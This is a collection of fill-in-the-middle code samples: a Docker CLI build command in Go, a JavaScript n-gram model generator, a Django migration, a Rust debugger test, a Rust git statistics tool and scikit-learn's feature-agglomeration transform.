<|file_name|>build.go<|end_file_name|><|fim▁begin|>package client import ( "archive/tar" "bufio" "encoding/base64" "encoding/json" "fmt" "io" "io/ioutil" "net/http" "net/url" "os" "os/exec" "path" "path/filepath" "regexp" "runtime" "strconv" "strings" "github.com/docker/docker/api" Cli "github.com/docker/docker/cli" "github.com/docker/docker/graph/tags" "github.com/docker/docker/opts" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/httputils" "github.com/docker/docker/pkg/jsonmessage" flag "github.com/docker/docker/pkg/mflag" "github.com/docker/docker/pkg/parsers" "github.com/docker/docker/pkg/progressreader" "github.com/docker/docker/pkg/streamformatter" "github.com/docker/docker/pkg/ulimit" "github.com/docker/docker/pkg/units" "github.com/docker/docker/pkg/urlutil" "github.com/docker/docker/registry" "github.com/docker/docker/utils" ) const ( tarHeaderSize = 512 ) // CmdBuild builds a new image from the source code at a given path. // // If '-' is provided instead of a path or URL, Docker will build an image from either a Dockerfile or tar archive read from STDIN. // // Usage: docker build [OPTIONS] PATH | URL | - func (cli *DockerCli) CmdBuild(args ...string) error { cmd := Cli.Subcmd("build", []string{"PATH | URL | -"}, "Build a new image from the source code at PATH", true) tag := cmd.String([]string{"t", "-tag"}, "", "Repository name (and optionally a tag) for the image") suppressOutput := cmd.Bool([]string{"q", "-quiet"}, false, "Suppress the verbose output generated by the containers") noCache := cmd.Bool([]string{"#no-cache", "-no-cache"}, false, "Do not use cache when building the image") rm := cmd.Bool([]string{"#rm", "-rm"}, true, "Remove intermediate containers after a successful build") forceRm := cmd.Bool([]string{"-force-rm"}, false, "Always remove intermediate containers") pull := cmd.Bool([]string{"-pull"}, false, "Always attempt to pull a newer version of the image") dockerfileName := cmd.String([]string{"f", "-file"}, "", "Name of the Dockerfile (Default is 'PATH/Dockerfile')") flMemoryString := cmd.String([]string{"m", "-memory"}, "", "Memory limit") flMemorySwap := cmd.String([]string{"-memory-swap"}, "", "Total memory (memory + swap), '-1' to disable swap") flCPUShares := cmd.Int64([]string{"c", "-cpu-shares"}, 0, "CPU shares (relative weight)") flCpuPeriod := cmd.Int64([]string{"-cpu-period"}, 0, "Limit the CPU CFS (Completely Fair Scheduler) period") flCpuQuota := cmd.Int64([]string{"-cpu-quota"}, 0, "Limit the CPU CFS (Completely Fair Scheduler) quota") flCPUSetCpus := cmd.String([]string{"-cpuset-cpus"}, "", "CPUs in which to allow execution (0-3, 0,1)") flCPUSetMems := cmd.String([]string{"-cpuset-mems"}, "", "MEMs in which to allow execution (0-3, 0,1)") flCgroupParent := cmd.String([]string{"-cgroup-parent"}, "", "Optional parent cgroup for the container") ulimits := make(map[string]*ulimit.Ulimit) flUlimits := opts.NewUlimitOpt(&ulimits) cmd.Var(flUlimits, []string{"-ulimit"}, "Ulimit options") cmd.Require(flag.Exact, 1) // For trusted pull on "FROM <image>" instruction. addTrustedFlags(cmd, true) cmd.ParseFlags(args, true) var ( context io.ReadCloser isRemote bool err error ) _, err = exec.LookPath("git") hasGit := err == nil specifiedContext := cmd.Arg(0) var ( contextDir string tempDir string relDockerfile string ) switch { case specifiedContext == "-": tempDir, relDockerfile, err = getContextFromReader(cli.in, *dockerfileName) case urlutil.IsGitURL(specifiedContext) && hasGit: tempDir, relDockerfile, err = getContextFromGitURL(specifiedContext, *dockerfileName) case urlutil.IsURL(specifiedContext): tempDir, relDockerfile, err = getContextFromURL(cli.out, specifiedContext, *dockerfileName) default: contextDir, relDockerfile, err = getContextFromLocalDir(specifiedContext, *dockerfileName) } if err != nil { return fmt.Errorf("unable to prepare context: %s", err) } if tempDir != "" { defer os.RemoveAll(tempDir) contextDir = tempDir } // Resolve the FROM lines in the Dockerfile to trusted digest references // using Notary. newDockerfile, err := rewriteDockerfileFrom(filepath.Join(contextDir, relDockerfile), cli.trustedReference) if err != nil { return fmt.Errorf("unable to process Dockerfile: %v", err) } defer newDockerfile.Close() // And canonicalize dockerfile name to a platform-independent one relDockerfile, err = archive.CanonicalTarNameForPath(relDockerfile) if err != nil { return fmt.Errorf("cannot canonicalize dockerfile path %s: %v", relDockerfile, err) } var includes = []string{"."} excludes, err := utils.ReadDockerIgnore(path.Join(contextDir, ".dockerignore")) if err != nil { return err } if err := utils.ValidateContextDirectory(contextDir, excludes); err != nil { return fmt.Errorf("Error checking context: '%s'.", err) } // If .dockerignore mentions .dockerignore or the Dockerfile // then make sure we send both files over to the daemon // because Dockerfile is, obviously, needed no matter what, and // .dockerignore is needed to know if either one needs to be // removed. The deamon will remove them for us, if needed, after it // parses the Dockerfile. Ignore errors here, as they will have been // caught by ValidateContextDirectory above. keepThem1, _ := fileutils.Matches(".dockerignore", excludes) keepThem2, _ := fileutils.Matches(relDockerfile, excludes) if keepThem1 || keepThem2 { includes = append(includes, ".dockerignore", relDockerfile) } context, err = archive.TarWithOptions(contextDir, &archive.TarOptions{ Compression: archive.Uncompressed, ExcludePatterns: excludes, IncludeFiles: includes, }) if err != nil { return err } // Wrap the tar archive to replace the Dockerfile entry with the rewritten // Dockerfile which uses trusted pulls. context = replaceDockerfileTarWrapper(context, newDockerfile, relDockerfile) // Setup an upload progress bar // FIXME: ProgressReader shouldn't be this annoying to use sf := streamformatter.NewStreamFormatter() var body io.Reader = progressreader.New(progressreader.Config{ In: context, Out: cli.out, Formatter: sf, NewLines: true, ID: "", Action: "Sending build context to Docker daemon", }) var memory int64 if *flMemoryString != "" { parsedMemory, err := units.RAMInBytes(*flMemoryString) if err != nil { return err } memory = parsedMemory } var memorySwap int64 if *flMemorySwap != "" { if *flMemorySwap == "-1" { memorySwap = -1 } else { parsedMemorySwap, err := units.RAMInBytes(*flMemorySwap) if err != nil { return err } memorySwap = parsedMemorySwap } } // Send the build context v := &url.Values{} //Check if the given image name can be resolved if *tag != "" { repository, tag := parsers.ParseRepositoryTag(*tag) if err := registry.ValidateRepositoryName(repository); err != nil { return err } if len(tag) > 0 { if err := tags.ValidateTagName(tag); err != nil { return err } } } v.Set("t", *tag) if *suppressOutput { v.Set("q", "1") } if isRemote { v.Set("remote", cmd.Arg(0)) } if *noCache { v.Set("nocache", "1") } if *rm { v.Set("rm", "1") } else { v.Set("rm", "0") } if *forceRm { v.Set("forcerm", "1") } if *pull { v.Set("pull", "1") } v.Set("cpusetcpus", *flCPUSetCpus) v.Set("cpusetmems", *flCPUSetMems) v.Set("cpushares", strconv.FormatInt(*flCPUShares, 10)) v.Set("cpuquota", strconv.FormatInt(*flCpuQuota, 10)) v.Set("cpuperiod", strconv.FormatInt(*flCpuPeriod, 10)) v.Set("memory", strconv.FormatInt(memory, 10)) v.Set("memswap", strconv.FormatInt(memorySwap, 10)) v.Set("cgroupparent", *flCgroupParent) v.Set("dockerfile", relDockerfile) ulimitsVar := flUlimits.GetList() ulimitsJson, err := json.Marshal(ulimitsVar) if err != nil { return err } v.Set("ulimits", string(ulimitsJson)) headers := http.Header(make(map[string][]string)) buf, err := json.Marshal(cli.configFile.AuthConfigs) if err != nil { return err } headers.Add("X-Registry-Config", base64.URLEncoding.EncodeToString(buf)) headers.Set("Content-Type", "application/tar") sopts := &streamOpts{ rawTerminal: true, in: body, out: cli.out, headers: headers, } serverResp, err := cli.stream("POST", fmt.Sprintf("/build?%s", v.Encode()), sopts) // Windows: show error message about modified file permissions. if runtime.GOOS == "windows" { h, err := httputils.ParseServerHeader(serverResp.header.Get("Server")) if err == nil { if h.OS != "windows" { fmt.Fprintln(cli.err, `SECURITY WARNING: You are building a Docker image from Windows against a non-Windows Docker host. All files and directories added to build context will have '-rwxr-xr-x' permissions. It is recommended to double check and reset permissions for sensitive files and directories.`) } } } if jerr, ok := err.(*jsonmessage.JSONError); ok { // If no error code is set, default to 1 if jerr.Code == 0 { jerr.Code = 1 } return Cli.StatusError{Status: jerr.Message, StatusCode: jerr.Code} } return err } // getDockerfileRelPath uses the given context directory for a `docker build` // and returns the absolute path to the context directory, the relative path of // the dockerfile in that context directory, and a non-nil error on success. func getDockerfileRelPath(givenContextDir, givenDockerfile string) (absContextDir, relDockerfile string, err error) { if absContextDir, err = filepath.Abs(givenContextDir); err != nil { return "", "", fmt.Errorf("unable to get absolute context directory: %v", err) } // The context dir might be a symbolic link, so follow it to the actual // target directory. absContextDir, err = filepath.EvalSymlinks(absContextDir) if err != nil { return "", "", fmt.Errorf("unable to evaluate symlinks in context path: %v", err) } stat, err := os.Lstat(absContextDir) if err != nil { return "", "", fmt.Errorf("unable to stat context directory %q: %v", absContextDir, err) } if !stat.IsDir() { return "", "", fmt.Errorf("context must be a directory: %s", absContextDir) } absDockerfile := givenDockerfile if absDockerfile == "" { // No -f/--file was specified so use the default relative to the // context directory. absDockerfile = filepath.Join(absContextDir, api.DefaultDockerfileName) // Just to be nice ;-) look for 'dockerfile' too but only // use it if we found it, otherwise ignore this check if _, err = os.Lstat(absDockerfile); os.IsNotExist(err) { altPath := filepath.Join(absContextDir, strings.ToLower(api.DefaultDockerfileName)) if _, err = os.Lstat(altPath); err == nil { absDockerfile = altPath } } } // If not already an absolute path, the Dockerfile path should be joined to // the base directory. if !filepath.IsAbs(absDockerfile) { absDockerfile = filepath.Join(absContextDir, absDockerfile) } // Evaluate symlinks in the path to the Dockerfile too. absDockerfile, err = filepath.EvalSymlinks(absDockerfile) if err != nil { return "", "", fmt.Errorf("unable to evaluate symlinks in Dockerfile path: %v", err) } if _, err := os.Lstat(absDockerfile); err != nil { if os.IsNotExist(err) { return "", "", fmt.Errorf("Cannot locate Dockerfile: %q", absDockerfile) } return "", "", fmt.Errorf("unable to stat Dockerfile: %v", err) } if relDockerfile, err = filepath.Rel(absContextDir, absDockerfile); err != nil { return "", "", fmt.Errorf("unable to get relative Dockerfile path: %v", err) } if strings.HasPrefix(relDockerfile, ".."+string(filepath.Separator)) { return "", "", fmt.Errorf("The Dockerfile (%s) must be within the build context (%s)", givenDockerfile, givenContextDir) } return absContextDir, relDockerfile, nil } // writeToFile copies from the given reader and writes it to a file with the // given filename. func writeToFile(r io.Reader, filename string) error { file, err := os.OpenFile(filename, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, os.FileMode(0600)) if err != nil { return fmt.Errorf("unable to create file: %v", err) } defer file.Close() if _, err := io.Copy(file, r); err != nil { return fmt.Errorf("unable to write file: %v", err) } return nil } // getContextFromReader will read the contents of the given reader as either a // Dockerfile or tar archive to be extracted to a temporary directory used as // the context directory. Returns the absolute path to the temporary context // directory, the relative path of the dockerfile in that context directory, // and a non-nil error on success. func getContextFromReader(r io.Reader, dockerfileName string) (absContextDir, relDockerfile string, err error) { buf := bufio.NewReader(r) magic, err := buf.Peek(tarHeaderSize) if err != nil && err != io.EOF { return "", "", fmt.Errorf("failed to peek context header from STDIN: %v", err) } if absContextDir, err = ioutil.TempDir("", "docker-build-context-"); err != nil { return "", "", fmt.Errorf("unbale to create temporary context directory: %v", err) } defer func(d string) { if err != nil { os.RemoveAll(d) } }(absContextDir) if !archive.IsArchive(magic) { // Input should be read as a Dockerfile. // -f option has no meaning when we're reading it from stdin, // so just use our default Dockerfile name relDockerfile = api.DefaultDockerfileName return absContextDir, relDockerfile, writeToFile(buf, filepath.Join(absContextDir, relDockerfile))<|fim▁hole|> if err := archive.Untar(buf, absContextDir, nil); err != nil { return "", "", fmt.Errorf("unable to extract stdin to temporary context directory: %v", err) } return getDockerfileRelPath(absContextDir, dockerfileName) } // getContextFromGitURL uses a Git URL as context for a `docker build`. The // git repo is cloned into a temporary directory used as the context directory. // Returns the absolute path to the temporary context directory, the relative // path of the dockerfile in that context directory, and a non-nil error on // success. func getContextFromGitURL(gitURL, dockerfileName string) (absContextDir, relDockerfile string, err error) { if absContextDir, err = utils.GitClone(gitURL); err != nil { return "", "", fmt.Errorf("unable to 'git clone' to temporary context directory: %v", err) } return getDockerfileRelPath(absContextDir, dockerfileName) } // getContextFromURL uses a remote URL as context for a `docker build`. The // remote resource is downloaded as either a Dockerfile or a context tar // archive and stored in a temporary directory used as the context directory. // Returns the absolute path to the temporary context directory, the relative // path of the dockerfile in that context directory, and a non-nil error on // success. func getContextFromURL(out io.Writer, remoteURL, dockerfileName string) (absContextDir, relDockerfile string, err error) { response, err := httputils.Download(remoteURL) if err != nil { return "", "", fmt.Errorf("unable to download remote context %s: %v", remoteURL, err) } defer response.Body.Close() // Pass the response body through a progress reader. progReader := &progressreader.Config{ In: response.Body, Out: out, Formatter: streamformatter.NewStreamFormatter(), Size: int(response.ContentLength), NewLines: true, ID: "", Action: fmt.Sprintf("Downloading build context from remote url: %s", remoteURL), } return getContextFromReader(progReader, dockerfileName) } // getContextFromLocalDir uses the given local directory as context for a // `docker build`. Returns the absolute path to the local context directory, // the relative path of the dockerfile in that context directory, and a non-nil // error on success. func getContextFromLocalDir(localDir, dockerfileName string) (absContextDir, relDockerfile string, err error) { // When using a local context directory, when the Dockerfile is specified // with the `-f/--file` option then it is considered relative to the // current directory and not the context directory. if dockerfileName != "" { if dockerfileName, err = filepath.Abs(dockerfileName); err != nil { return "", "", fmt.Errorf("unable to get absolute path to Dockerfile: %v", err) } } return getDockerfileRelPath(localDir, dockerfileName) } var dockerfileFromLinePattern = regexp.MustCompile(`(?i)^[\s]*FROM[ \f\r\t\v]+(?P<image>[^ \f\r\t\v\n#]+)`) type trustedDockerfile struct { *os.File size int64 } func (td *trustedDockerfile) Close() error { td.File.Close() return os.Remove(td.File.Name()) } // rewriteDockerfileFrom rewrites the given Dockerfile by resolving images in // "FROM <image>" instructions to a digest reference. `translator` is a // function that takes a repository name and tag reference and returns a // trusted digest reference. func rewriteDockerfileFrom(dockerfileName string, translator func(string, registry.Reference) (registry.Reference, error)) (newDockerfile *trustedDockerfile, err error) { dockerfile, err := os.Open(dockerfileName) if err != nil { return nil, fmt.Errorf("unable to open Dockerfile: %v", err) } defer dockerfile.Close() scanner := bufio.NewScanner(dockerfile) // Make a tempfile to store the rewritten Dockerfile. tempFile, err := ioutil.TempFile("", "trusted-dockerfile-") if err != nil { return nil, fmt.Errorf("unable to make temporary trusted Dockerfile: %v", err) } trustedFile := &trustedDockerfile{ File: tempFile, } defer func() { if err != nil { // Close the tempfile if there was an error during Notary lookups. // Otherwise the caller should close it. trustedFile.Close() } }() // Scan the lines of the Dockerfile, looking for a "FROM" line. for scanner.Scan() { line := scanner.Text() matches := dockerfileFromLinePattern.FindStringSubmatch(line) if matches != nil && matches[1] != "scratch" { // Replace the line with a resolved "FROM repo@digest" repo, tag := parsers.ParseRepositoryTag(matches[1]) if tag == "" { tag = tags.DEFAULTTAG } ref := registry.ParseReference(tag) if !ref.HasDigest() && isTrusted() { trustedRef, err := translator(repo, ref) if err != nil { return nil, err } line = dockerfileFromLinePattern.ReplaceAllLiteralString(line, fmt.Sprintf("FROM %s", trustedRef.ImageName(repo))) } } n, err := fmt.Fprintln(tempFile, line) if err != nil { return nil, err } trustedFile.size += int64(n) } tempFile.Seek(0, os.SEEK_SET) return trustedFile, scanner.Err() } // replaceDockerfileTarWrapper wraps the given input tar archive stream and // replaces the entry with the given Dockerfile name with the contents of the // new Dockerfile. Returns a new tar archive stream with the replaced // Dockerfile. func replaceDockerfileTarWrapper(inputTarStream io.ReadCloser, newDockerfile *trustedDockerfile, dockerfileName string) io.ReadCloser { pipeReader, pipeWriter := io.Pipe() go func() { tarReader := tar.NewReader(inputTarStream) tarWriter := tar.NewWriter(pipeWriter) defer inputTarStream.Close() for { hdr, err := tarReader.Next() if err == io.EOF { // Signals end of archive. tarWriter.Close() pipeWriter.Close() return } if err != nil { pipeWriter.CloseWithError(err) return } var content io.Reader = tarReader if hdr.Name == dockerfileName { // This entry is the Dockerfile. Since the tar archive was // generated from a directory on the local filesystem, the // Dockerfile will only appear once in the archive. hdr.Size = newDockerfile.size content = newDockerfile } if err := tarWriter.WriteHeader(hdr); err != nil { pipeWriter.CloseWithError(err) return } if _, err := io.Copy(tarWriter, content); err != nil { pipeWriter.CloseWithError(err) return } } }() return pipeReader }<|fim▁end|>
}
<|file_name|>ngram-process.js<|end_file_name|><|fim▁begin|>"use strict"; var filters = require('./filters'), uniq = require('uniq'); var doNgram = function doNgram (string, resultData, config) { var ngramCount = string.length - config.n + 1, ngram, previousNgram = null, ngramData, i; for (i = 0; i < ngramCount; i++) { ngram = string.substr(i, config.n); if (!resultData.elements[ngram]) { ngramData = resultData.elements[ngram] = { probabilityAsFirst: 0, children: {}, lastChildren: {} }; } else { ngramData = resultData.elements[ngram]; } if (i === 0) { ngramData.probabilityAsFirst++; } if (previousNgram !== null) { if (i === ngramCount - 1) { if (!previousNgram.lastChildren[ngram]) { previousNgram.lastChildren[ngram] = 1; } else { previousNgram.lastChildren[ngram]++; } } else { if (!previousNgram.children[ngram]) { previousNgram.children[ngram] = 1; } else { previousNgram.children[ngram]++; } } } previousNgram = ngramData; } }; var postProcessData = function postProcessData (resultData, compressFloat) { var keys = Object.keys(resultData.elements), childrenKeys, validFirst = {}, sumFirst = 0, sumChildren = 0, key, data, i, k; for (i = 0; i < keys.length; i++) { key = keys[i]; data = resultData.elements[key]; if (data.probabilityAsFirst > 0) { if (!validFirst[key]) { validFirst[key] = data.probabilityAsFirst; sumFirst += data.probabilityAsFirst; } else { validFirst[key] += data.probabilityAsFirst; sumFirst += data.probabilityAsFirst; } } delete data.probabilityAsFirst; childrenKeys = Object.keys(data.children); sumChildren = 0; for (k = 0; k < childrenKeys.length; k++) { sumChildren += data.children[childrenKeys[k]]; } for (k = 0; k < childrenKeys.length; k++) { data.children[childrenKeys[k]] /= sumChildren; data.children[childrenKeys[k]] = compressFloat(data.children[childrenKeys[k]]); } data.hasChildren = childrenKeys.length > 0; childrenKeys = Object.keys(data.lastChildren); sumChildren = 0; for (k = 0; k < childrenKeys.length; k++) { sumChildren += data.lastChildren[childrenKeys[k]]; } for (k = 0; k < childrenKeys.length; k++) { data.lastChildren[childrenKeys[k]] /= sumChildren; data.lastChildren[childrenKeys[k]] = compressFloat(data.lastChildren[childrenKeys[k]]); } data.hasLastChildren = childrenKeys.length > 0; } keys = Object.keys(validFirst); for (i = 0; i < keys.length; i++) { key = keys[i]; validFirst[key] /= sumFirst; validFirst[key] = compressFloat(validFirst[key]); } resultData.firstElements = validFirst; return resultData; }; var compact = function compact (resultData) { var keys = Object.keys(resultData.elements), ngramData, ngramDesc, i; for (i = 0; i < keys.length; i++) { ngramData = resultData.elements[keys[i]]; ngramDesc = [ ngramData.hasChildren ? ngramData.children : 0, ngramData.hasLastChildren ? ngramData.lastChildren : 0 ]; resultData.elements[keys[i]] = ngramDesc; } resultData.e = resultData.elements; resultData.fe = resultData.firstElements; delete resultData.elements; delete resultData.firstElements; }; var stringToRegExp = function stringToRegExp (string) { var match = string.match(/^\/(.+)\/([igmuy]+)$/), regex = null; if (match !== null) { regex = new RegExp(match[1], match[2]); } return regex; }; var preProcessString = function preProcessString (string, config) { string = string.toLowerCase(); if (config.filter) { var filterRegex = null; if (config.filter instanceof RegExp) { filterRegex = config.filter } else if (filters.hasOwnProperty(config.filter)) { filterRegex = filters[config.filter]; } else { filterRegex = stringToRegExp(config.filter); } if (filterRegex) { string = string.replace(filterRegex, ' '); } } var strings = string.split(/\s+/).filter(function (v) { return v.length > 0; }); if (config.minLength) { strings = strings.filter(function (v) { return v.length > config.minLength; }); } if (config.unique) { uniq(strings); } return strings; }; /** * Generate an n-gram model based on a given text * @param {string} data Text corpus as a single, preferably large, string * @param {object} config Configuration options * @param {string} [config.name] Name of the n-gram model, not directly used * @param {int} [config.n=3] Order of the model (1: unigram, 2: bigram, 3: trigram, ...) * @param {int} [config.minLength=n] Minimum length of the word considered in the generation of the model * @param {bool} [config.unique=false] Avoid skewing the generation toward the most repeated words in the text corpus * @param {bool} [config.compress=false] Reduce the size of the model file, making it slightly less accurate * @param {bool} [config.excludeOriginal=false] Include the full list of the words considered in the generation so they can be blacklisted * @param {string|RegExp} [config.filter='extended'] Character filtering option, either one the existing filters (none, alphabetical, numerical, alphaNumerical, extended, extendedNumerical, french, english, oldEnglish, chinese, japanese, noSymbols) or a RegExp object * @returns {object} N-gram model built from the text corpus */ module.exports = function generateModel (data, config) { config = config || {}; config.name = config.name || null; config.filter = config.filter || 'extended'; config.n = parseInt(config.n, 10) || 3; config.minLength = parseInt(config.minLength, 10) || config.n; config.unique = !!config.unique; config.excludeOriginal = !!config.excludeOriginal; config.compress = !!config.compress; if (config.minLength < config.n) { throw new Error('N-gram error: The minLength value must be larger than or equal to n'); } <|fim▁hole|> unique: config.unique ? 1 : 0, excludeOriginal: config.excludeOriginal ? 1 : 0 }; var resultData = { elements: {} }; var excludeData = []; var strings = preProcessString(data, config); for (var i = 0; i < strings.length; i++) { doNgram(strings[i], resultData, config); if (config.excludeOriginal && excludeData.indexOf(strings[i]) === -1) { excludeData.push(strings[i]); } } var formatFloat = config.compress ? function compressFloat (float, precision) { return parseFloat(float.toFixed(precision || 7)); } : function (v) { return v; }; compact(postProcessData(resultData, formatFloat)); return { config: resultConfig, data: resultData, exclude: excludeData.length ? excludeData : 0 }; };<|fim▁end|>
var resultConfig = { name: config.name, n: config.n, minLength: config.minLength,
<|file_name|>0031_auto_20170601_1502.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-06-01 12:02 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('website', '0030_github_user'), ] operations = [ migrations.AddField( model_name='linkedin_user', name='number_all_repos', field=models.IntegerField(default=0), ), migrations.AddField( model_name='linkedin_user', name='number_repos1', field=models.IntegerField(default=0), ), migrations.AddField( model_name='linkedin_user', name='number_repos2', field=models.IntegerField(default=0), ), migrations.AddField(<|fim▁hole|> field=models.IntegerField(default=0), ), migrations.AddField( model_name='linkedin_user', name='technology1', field=models.CharField(default='', max_length=50), ), migrations.AddField( model_name='linkedin_user', name='technology2', field=models.CharField(default='', max_length=50), ), migrations.AddField( model_name='linkedin_user', name='technology3', field=models.CharField(default='', max_length=50), ), ]<|fim▁end|>
model_name='linkedin_user', name='number_repos3',
<|file_name|>borrowed-struct.rs<|end_file_name|><|fim▁begin|>// Copyright 2013-2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. // ignore-android: FIXME(#10381) // compile-flags:-g // === GDB TESTS =================================================================================== // gdb-command:rbreak zzz // gdb-command:run // gdb-command:finish // gdb-command:print *stack_val_ref // gdb-check:$1 = {x = 10, y = 23.5} // gdb-command:print *stack_val_interior_ref_1 // gdb-check:$2 = 10 // gdb-command:print *stack_val_interior_ref_2 // gdb-check:$3 = 23.5 // gdb-command:print *ref_to_unnamed // gdb-check:$4 = {x = 11, y = 24.5} // gdb-command:print *unique_val_ref // gdb-check:$5 = {x = 13, y = 26.5} // gdb-command:print *unique_val_interior_ref_1 // gdb-check:$6 = 13 // gdb-command:print *unique_val_interior_ref_2 // gdb-check:$7 = 26.5 // === LLDB TESTS ================================================================================== // lldb-command:run // lldb-command:print *stack_val_ref // lldb-check:[...]$0 = SomeStruct { x: 10, y: 23.5 } // lldb-command:print *stack_val_interior_ref_1 // lldb-check:[...]$1 = 10 // lldb-command:print *stack_val_interior_ref_2 // lldb-check:[...]$2 = 23.5 // lldb-command:print *ref_to_unnamed // lldb-check:[...]$3 = SomeStruct { x: 11, y: 24.5 } // lldb-command:print *unique_val_ref<|fim▁hole|>// lldb-check:[...]$5 = 13 // lldb-command:print *unique_val_interior_ref_2 // lldb-check:[...]$6 = 26.5 #![allow(unused_variable)] struct SomeStruct { x: int, y: f64 } fn main() { let stack_val: SomeStruct = SomeStruct { x: 10, y: 23.5 }; let stack_val_ref: &SomeStruct = &stack_val; let stack_val_interior_ref_1: &int = &stack_val.x; let stack_val_interior_ref_2: &f64 = &stack_val.y; let ref_to_unnamed: &SomeStruct = &SomeStruct { x: 11, y: 24.5 }; let unique_val = box SomeStruct { x: 13, y: 26.5 }; let unique_val_ref: &SomeStruct = &*unique_val; let unique_val_interior_ref_1: &int = &unique_val.x; let unique_val_interior_ref_2: &f64 = &unique_val.y; zzz(); // #break } fn zzz() {()}<|fim▁end|>
// lldb-check:[...]$4 = SomeStruct { x: 13, y: 26.5 } // lldb-command:print *unique_val_interior_ref_1
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>extern crate git2; extern crate chrono; #[macro_use] extern crate serde_derive; extern crate docopt; extern crate core; extern crate regex; #[macro_use] extern crate prettytable; #[cfg(test)] extern crate tempdir; use docopt::Docopt; mod snapshot; mod heatmap; mod mailmap; mod personal; #[cfg(test)] mod test; #[derive(Debug, Deserialize)] pub struct Args { arg_path: String } #[cfg(not(test))] fn main() { const USAGE: &'static str = " usage: gitostat [options] <path> Options: -h, --help show this message "; let args: Args = Docopt::new(USAGE) .and_then(|d| d.deserialize()) .unwrap_or_else(|e| e.exit()); match gitostat::run(&args) { Ok(()) => {}, Err(e) => println!("error: {}", e) } } macro_rules! error( ($($arg:tt)*) => ( use std::io::Write; match writeln!(&mut ::std::io::stderr(), $($arg)* ) { Ok(_) => {}, Err(x) => panic!("Unable to write to stderr: {}", x), } ) ); #[macro_export] /// converts errors into None and output them into stderr. macro_rules! otry { ($e:expr) => (match $e { Ok(e) => e, Err(e) => { error!("ERROR!: {:?} {} {}", e, file!(), line!()); return None } }) } mod gitostat { use git2; use std::cmp; use std::path::Path; use std::collections::BTreeMap; use Args; use snapshot::HasSnapshot; use heatmap::Heatmap; use mailmap::Mailmap; use personal::PersonalStats; pub fn run(args: &Args) -> Result<(), git2::Error> { let path = Path::new(&args.arg_path); let repo = git2::Repository::open(path)?; let mailmap = Mailmap::new(&path.join(".mailmap")); self::info(&repo, mailmap.as_ref()) } fn info(repo: &git2::Repository, mailmap: Option<&Mailmap>) -> Result<(), git2::Error> { let mut revwalk = repo.revwalk()?; revwalk.push_head()?; revwalk.set_sorting(git2::SORT_TOPOLOGICAL); let commits: Vec<git2::Commit> = revwalk.filter_map(|oid| { // trying lookup commit in repo, skip if any error let commit = otry!(repo.find_commit(otry!(oid))); // also skip merge-commits if commit.parents().len() > 1 { return None; } Some(commit) }).collect(); let mut heatmap = Heatmap::new(); let mut authors = PersonalStats::new(&repo); let mut num_files: BTreeMap<String, usize> = BTreeMap::new(); for (i, commit) in commits.iter().enumerate() { print!("[{}/{}]\r", i+1, commits.len()); heatmap.append(&commit.author().when()); authors.append(&commit, mailmap)?; let files = repo.snapshot(&commit, false)?; let key = format!("{}", files.datetime.format("%Y-%W")); let number = num_files.entry(key).or_insert(0); *number = cmp::max(*number, files.len()); } println!(""); if let Some(commit) = commits.first() { // skip binary files because they don't counted in diffs let files = repo.snapshot(commit, true)?; authors.blame(&files, mailmap)?; println!("Scaned {}", files.len()); } let mut vec: Vec<usize> = num_files.values().cloned().collect(); vec.sort_by(|a, b| b.cmp(a)); let max = cmp::max(1, vec[0]); const WIDTH: usize = 60; let coeff = if max > WIDTH { WIDTH as f32 / max as f32 } else { 1f32 }; println!("Files in repo:"); for (key, &val) in &num_files { let value = (val as f32 * coeff).round() as usize; let bar = (0..value).map(|_| "░").collect::<String>(); println!("{} {:3} {}", key, val, bar + "▏"); } println!(""); println!("{}", heatmap); println!("{}", authors); Ok(())<|fim▁hole|><|fim▁end|>
} }
<|file_name|>_feature_agglomeration.py<|end_file_name|><|fim▁begin|>""" Feature agglomeration. Base classes and functions for performing feature agglomeration. """ # Author: V. Michel, A. Gramfort # License: BSD 3 clause import numpy as np from ..base import TransformerMixin from ..utils import array2d ############################################################################### # Mixin class for feature agglomeration. class AgglomerationTransform(TransformerMixin): """ A class for feature agglomeration via the transform interface """ def transform(self, X, pooling_func=np.mean): """ Transform a new matrix using the built clustering Parameters --------- X : array-like, shape = [n_samples, n_features] A M by N array of M observations in N dimensions or a length M array of M one-dimensional observations. pooling_func : a function that takes an array of shape = [M, N] and return an array of value of size M. Defaut is np.mean """ X = array2d(X) nX = [] if len(self.labels_) != X.shape[1]: raise ValueError("X has a different number of features than " "during fitting.") for l in np.unique(self.labels_): nX.append(pooling_func(X[:, self.labels_ == l], axis=1)) return np.array(nX).T def inverse_transform(self, Xred): """ Inverse the transformation. Return a vector of size nb_features with the values of Xred assigned to each group of features Parameters ---------- Xred : array of size k The values to be assigned to each cluster of samples Returns ------- X : array of size nb_samples A vector of size nb_samples with the values of Xred assigned to each of the cluster of samples. """ if np.size((Xred.shape)) == 1:<|fim▁hole|> for i in range(len(unil)): if np.size((Xred.shape)) == 1: X[self.labels_ == unil[i]] = Xred[i] else: X[:, self.labels_ == unil[i]] = array2d(Xred[:, i]).T return X<|fim▁end|>
X = np.zeros([self.labels_.shape[0]]) else: X = np.zeros([Xred.shape[0], self.labels_.shape[0]]) unil = np.unique(self.labels_)
